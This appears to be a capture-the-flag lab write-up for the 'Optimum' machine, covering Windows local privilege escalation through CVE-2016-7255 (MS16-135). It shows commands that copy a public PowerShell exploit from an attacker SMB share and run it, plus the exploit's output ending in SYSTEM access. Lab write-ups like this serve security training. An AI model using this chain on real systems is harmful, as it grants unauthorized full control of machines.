InfoSec LAB

Optimum_Privilege_Escalation_2

Created: 3 min read

Sherlock found out that the target system is vulnerable to CVE-2016-7255 which was later patched with MS16-135

CVE-2016-7255(MS16-135)

a vulnerability classified as critical has been found in microsoft windows (Operating System). This affects an unknown part in the library win32k.sys. The manipulation with an unknown input leads to a access control vulnerability. CWE is classifying the issue as CWE-264. This is going to have an impact on confidentiality, integrity, and availability.

the weakness was released 11/08/2016 by neel mehta with trend micro as ms16-135 as confirmed bulletin (technet). it is possible to read the advisory at technet.microsoft.com. This vulnerability is uniquely identified as CVE-2016-7255 since 09/09/2016. The exploitability is told to be easy. Attacking locally is a requirement. A authentication is necessary for exploitation. Technical details and a public exploit are known. The attack technique deployed by this issue is T1068 according to MITRE ATT&CK.

Exploit

I found a Power Shell implementation of the exploit

Privilege Escalation

PS C:\tmp> copy \\10.10.14.6\smb\MS16-135.ps1
PS C:\tmp> .\MS16-135.ps1
	 _____ _____ ___   ___     ___   ___ ___ 
	|     |   __|_  | |  _|___|_  | |_  |  _|
	| | | |__   |_| |_| . |___|_| |_|_  |_  |
	|_|_|_|_____|_____|___|   |_____|___|___|
										
	                   [by b33f -> @FuzzySec]
					   
[?] Target is Win 8.1
[+] Bitmap dimensions: 0x760*0x4
 
[?] Adjacent large session pool feng shui..
[+] Worker  : FFFFF90144234000
[+] Manager : FFFFF90144236000
[+] Distance: 0x2000
 
[?] Creating Window objects
[+] Corrupting child window spmenu
[+] Trying to trigger arbitrary 'Or'..
[+] Trying to trigger arbitrary 'Or'..
 
[?] Success, reading beyond worker bitmap size!
[+] Old manager bitmap pvScan0: FFFFF90144236260
[+] New manager bitmap pvScan0: FFFFF90144234050
 
[>] Leaking SYSTEM _EPROCESS..
[+] _EPROCESS list entry: 0xFFFFF80009F64028
[+] SYSTEM _EPROCESS address: 0xFFFFE001F4EAE900
[+] PID: 4
[+] SYSTEM Token: 0xFFFFC000170079BB
 
[>] Leaking current _EPROCESS..
[+] Traversing ActiveProcessLinks list
[+] PowerShell _EPROCESS address: 0xFFFFE001F835C080
[+] PID: 2808
[+] PowerShell Token: 0xFFFFC00019B929FA
 
[!] Duplicating SYSTEM token!
 
PS C:\tmp> whoami
nt authority\system
PS C:\tmp> hostname
optimum
PS C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
 
Tunnel adapter isatap.{99C463C2-DC10-45A6-9CC8-E62F160519AE}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

System Level Compromise

Interactive Graph View

Backlinks